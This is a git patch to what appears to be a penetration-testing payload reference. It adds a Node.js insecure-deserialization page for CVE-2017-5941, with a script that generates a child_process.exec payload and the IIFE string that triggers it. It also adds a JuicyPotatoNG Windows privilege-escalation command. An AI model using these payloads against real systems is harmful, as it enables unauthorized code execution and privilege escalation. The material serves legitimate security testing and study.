From 72a8556dc91b4700a75461dd544fade14d8c87d0 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 23 Sep 2022 11:21:29 +0200 Subject: [PATCH] NodeJS Serialization --- .../Files/node-serialize.js | 5 +++ Insecure Deserialization/Node.md | 34 +++++++++++++++++++ .../Windows - Privilege Escalation.md | 11 +++++- 3 files changed, 49 insertions(+), 1 deletion(-) create mode 100644 Insecure Deserialization/Files/node-serialize.js create mode 100644 Insecure Deserialization/Node.md diff --git a/Insecure Deserialization/Files/node-serialize.js b/Insecure Deserialization/Files/node-serialize.js new file mode 100644 index 0000000..a22304c --- /dev/null +++ b/Insecure Deserialization/Files/node-serialize.js @@ -0,0 +1,5 @@ +var y = { + rce : function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });}, +} +var serialize = require('node-serialize'); +console.log("Serialized: \n" + serialize.serialize(y)); \ No newline at end of file diff --git a/Insecure Deserialization/Node.md b/Insecure Deserialization/Node.md new file mode 100644 index 0000000..8a9147a --- /dev/null +++ b/Insecure Deserialization/Node.md @@ -0,0 +1,34 @@ +# Node + +## Summary + +* [Exploit](#exploit) +* [References](#references) + +## Exploit + +> An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the `unserialize()` function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE). + +1. Generate a serialized payload + ```js + var y = { + rce : function(){ + require('child_process').exec('ls /', function(error, + stdout, stderr) { console.log(stdout) }); + }, + } + var serialize = require('node-serialize'); + console.log("Serialized: \n" + serialize.serialize(y)); + ``` +2. Add bracket `()` to force the execution + ```js + {"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });}()"} + ``` +3. Send the payload + + +## References + +* [Exploiting Node.js deserialization bug for Remote Code Execution (CVE-2017-5941) - Ajin Abraham](https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf) +* [NodeJS Deserialization - 8 January 2020- gonczor](https://blacksheephacks.pl/nodejs-deserialization/) +* [CVE-2017-5941 - NATIONAL VULNERABILITY DATABASE - 02/09/2017](https://nvd.nist.gov/vuln/detail/CVE-2017-5941) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 35cc70a..a58d456 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -1289,6 +1289,14 @@ C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe EfsPotato.cs C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe /platform:x86 EfsPotato.cs ``` +### JuicyPotatoNG + +* [antonioCoco/JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG) + +```powershell +JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami" > C:\juicypotatong.txt +``` + ## EoP - Privileged File Write @@ -1505,4 +1513,5 @@ Detailed information about the vulnerability : https://www.zerodayinitiative.com * [Abusing SeLoadDriverPrivilege for privilege escalation - 14 JUN 2018 - OSCAR MALLO](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/) * [Universal Privilege Escalation and Persistence – Printer - AUGUST 2, 2021)](https://pentestlab.blog/2021/08/02/universal-privilege-escalation-and-persistence-printer/) * [ABUSING ARBITRARY FILE DELETES TO ESCALATE PRIVILEGE AND OTHER GREAT TRICKS - March 17, 2022 | Simon Zuckerbraun](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks) -* [Bypassing AppLocker by abusing HashInfo - 2022-08-19 - Ian](https://shells.systems/post-bypassing-applocker-by-abusing-hashinfo/) \ No newline at end of file +* [Bypassing AppLocker by abusing HashInfo - 2022-08-19 - Ian](https://shells.systems/post-bypassing-applocker-by-abusing-hashinfo/) +* [Giving JuicyPotato a second chance: JuicyPotatoNG - @decoder_it, @splinter_code](https://decoder.cloud/2022/09/21/giving-juicypotato-a-second-chance-juicypotatong/) \ No newline at end of file